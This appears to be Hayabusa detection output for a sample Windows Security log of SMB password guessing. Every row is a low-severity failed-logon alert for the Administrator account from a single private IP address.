NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDUqydSeA1guOjIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o71TltsJDyOIuLQb : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXT3MSCes42dVCNn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FGXiWeT8Evr6G70M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V2RarzrnGgcLaseH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3k7dXu9o1vMkhby : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EDBt76dmYnPstFWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4yjzMC7cw0fe7gjS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eQOWCM7KP68DZTX9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kn9WWWqCIwfrPbie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQcamLSzsXOjP6FL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6R6ZMRoYkAPB35Bq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubqnZm0jmHNFCHrM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ORQ8vL1oo6CkJXK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rDPl1SSddrWEs979 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrK7fENAr1lxFr9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wu4djhEVSMYBOmjF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e0NOdXhEkW6MskA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nqxLHaOtkHHNAa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCrCf73NtEpk5DUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YVFm1epksVGO1nFY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVehuMHvh5kVqRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sERZrNUHsKVEShCb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaSNgw2hvkxLnQF8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FSYOWptgxHYTDv1x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Van1qwuRoWYPWrIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyLCa9OHocazZKQ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxrR5iUsTI9LVnLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxMREacN0QfvL51B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fbzSHaZBDH4zFZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NgIei0bMIcslJCVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JPoKjwanczELBC5A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOYMVAnCWB2RFYAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1S45GBtQ8Uoyilw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60oeDAnU41sz1wYg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enjlrrdf6lrm7Bao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58WzO6wxh7QshZgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eZKzHgu5ADLYsWU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uOSK3xC1E5PpBVNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vFXasYWGCHbQOWWI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XlYJ3oHYKYhg0KC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LxOKwi8Q4y2mHBDu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwFKFySH4w2yWtPX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlwGTGadOEMfUFiM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hZ9WuMoOtxGdwOQn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cCLK0gWvRoz0Ceao : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDrcOxtm2fHXK5pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm2tPGetcAJkSuvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FBskiUSfF2ghuDcF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZJal2nq3JAk6I2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9ek0Sl1ikhIfIb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eHrn5Tp9JtnAgCbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7tR8gp2piqqixqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SqSBRMoiFeWe4FAt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nu4m1xKDU0OUkoR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gui98cdQHPgyNOZI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bm4U7TAfsPTEiygC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fDOoaVWVFAMLiA71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qiJeLgInEkHffefo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWyguWQP2iYUArhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vDa3GqsTMMXguFhi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lr0lkAcdnji1zjW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4WfNFd5MkQxaxHGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8hdPhtxP4Ds65yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2BBoWoXWXuRysTx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6GEhZ2BduHwjJj9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GbwEHQCAUJd64LlA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wGfoObbN8ioefyce : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iLHhCgHvmOzoLLqG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9KL69y47DMyFOWT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ECuVYiqdMw2dMjT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YJCYumRekD7AREYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0H4OxKzoemZrsosT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
